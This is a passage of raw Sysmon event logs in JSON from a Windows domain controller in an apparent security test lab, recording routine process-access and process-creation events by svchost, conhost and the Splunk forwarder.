05:46:51.125","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2211,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.125\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.125","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2212,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.125\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.125","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2213,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.125\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.125","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2214,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.125\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.125","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2215,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.125\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.125","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2216,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.125\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01CB-5F25-0000-0010E9030400}\r\nTargetProcessId: 3868\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.125","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01CB-5F25-0000-0010E9030400}","TargetProcessId":"3868","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2217,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.237\r\nProcessGuid: {A837DB8D-01CB-5F25-0000-001080060400}\r\nProcessId: 3812\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\powershell.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nParentProcessId: 3088\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.237","ProcessGuid":"{A837DB8D-01CB-5F25-0000-001080060400}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\powershell.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","ParentProcessId":"3088","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2218,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.234\r\nSourceProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nSourceProcessId: 3088\r\nSourceThreadId: 3772\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-01CB-5F25-0000-001080060400}\r\nTargetProcessId: 3812\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.234","SourceProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","SourceProcessId":"3088","SourceThreadId":"3772","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-01CB-5F25-0000-001080060400}","TargetProcessId":"3812","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program 